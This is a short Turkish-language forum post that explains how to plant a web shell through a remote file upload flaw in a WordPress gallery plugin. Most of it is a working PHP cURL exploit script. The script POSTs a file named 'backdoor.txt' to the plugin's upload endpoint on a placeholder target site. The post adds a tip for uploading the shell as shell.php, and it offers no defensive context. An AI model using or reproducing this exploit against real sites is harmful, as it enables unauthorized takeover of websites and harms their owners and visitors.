Wordpress gallery-plugin Shell yüklemek. (1 Viewer)

Joined
Oct 24, 2016
Credits
0
Rating - 0%
Wordpress
gallery-plugin adlı eklentide olan bir remote upload açığı sayesinde istediğimiz dosyayı yükletebiliyoruz

PHP:
<?php
 
$uploadfile="backdoor.txt";
$ch =
curl_init("http://hedef.com/wp-content/plugins/gallery-plugin/upload/php.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
 
?>

php çalışmayan bir dizinden shell.php şeklinde karşı tarafa yükletebilirsinizde..
 

Users who are viewing this thread

Top